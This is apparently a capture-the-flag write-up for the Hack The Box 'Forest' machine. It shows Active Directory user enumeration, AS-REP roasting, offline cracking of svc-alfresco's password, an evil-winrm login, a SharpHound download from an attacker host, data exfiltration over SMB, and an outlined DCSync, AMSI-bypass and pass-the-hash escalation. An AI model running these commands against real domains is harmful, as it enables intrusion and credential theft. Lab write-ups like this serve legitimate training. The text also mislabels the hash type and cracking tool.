Forest

Enumeration

nmap

Initian enumeration with nmap

Some usefull information:

Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2022-06-13T01:57:38-07:00

OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3

3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)

Lets enumerate users. For the user enumeration, we can search for objectClass as person and search for sAMAccountName:.

Users

=======================================( Users on 10.129.95.210 )=======================================
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

ASREPRoast

EXPLANATION- For the user accounts that are enabled with no pre-Authentication,(basically Kerberos pre-authentication is disabled) it’s vulnerable to AS-REP Roasting attack. We can request for that user’s Kerberos TGT ticket without providing any authentication, and the TGT ticket which we will get back will be encrypted with the account’s password. So we can crack the hash offline.Using the Impacket’s GetNPUsers.py script, we can do the attack:

Save the list of users in a file, and lets use GetNPUsers.py

GetNPUsers.py htb.local/ -no-pass -usersfile users    
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:28a1170a7195863540958b52e6bbb280$d4652fa91e48bbd92d0ab6e48587a387facdd084a00e7b6af81269add267b96ba8d96e1cabf89c5cef9dfa036407d43fb111358a68a8a2a2cc289177d6f6778e40aba64ec828fd108050edbbe7aacfa098897f8012539de5aec2921234790474b73773b291561b3b775117ea23e8ac3a969db66fb99e8156fd89e00c4769b548e597030639d1cc4433b3978782f75e1661a977680dfbc6cefc08354b01c253669d9af8ad6abe3e5c55742d99a9d5c1787b1c1019f23b20dca3a6ff806be411d06b2c0efae4e2357452ed943520019020e7d951bd6bd2de6d02cd66079120233d1e718e8a561d
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set

Cracking the Password

The Kerberos pre-authentication for the user svc-alfresco is turned off, and the KDC provided a TGT encrypted using the user’s password.

Store the encrypted TGT in a file named hash.txt. We’ll then decrypt it using hashcat. Given that the hash is of type NTLMv2, we’ll utilize the -m 18200 flag.

john --wordlist=/usr/share/wordlists/rockyou.txt hash     
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          ($krb5asrep$23$svc-alfresco@HTB.LOCAL)     
1g 0:00:00:28 DONE (2022-06-13 05:21) 0.03519g/s 143814p/s 143814c/s 143814C/s s401447401447401447..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Testing the credentials:

Connection

The password of the user svc-alfresco is s3rvice. Now since we have the svc-alfresco’s password we can log in using crackmapexecor evil-winrm to gain initial foothold.

evil-winrm -i 10.129.95.210 -u svc-alfresco -p s3rvice

Getting user flag:

Local enumeration

Copy sharphound.exe to the machine:

Powershell.exe -ExecutionPolicy Bypass Invoke-WebRequest "http://10.10.16.13/sharphound.exe" -OutFile "sharp.exe"

Execute:

./sharp.exe -c all --zipfilename forest.zip

Open a smb server to file transfer:

smbserver.py -comment SHARE -username test -password test -ip 10.10.14.8 -port 445 -smb2support SHARE ./

Map the drive and copy the file

net use y: \\10.10.14.8\SHARE /user:test test
copy 20220613040930_file.zip y:

Drag the zip into the bloodhound

Use the query “Shortest Paths to Domain Admins from Owned Principals”

Use the query “Shortestpaths to high value targets”

One of the paths shows that the Exchange Windows Permissions group has WriteDACL privileges on the Domain. The WriteDACL privilege allows a user to add ACLs to an object. This implies that we can include a user in this group and grant them DCSync rights.

DCSync - Exploit

Crete a new user and set the group:

Copy PowerView to the host and run Bypass-AMSI.

The Bypass-AMSI command is used to bypass Defender before importing the script. Next, we can use the Add-ObjectACL with John’s credentials, and grant him DCSync rights.

Assigning DCSync rights to the user:

Dump the credentials:

I attempted cracking without success, so I resorted to using pass the hash with psexec

Getting root flag: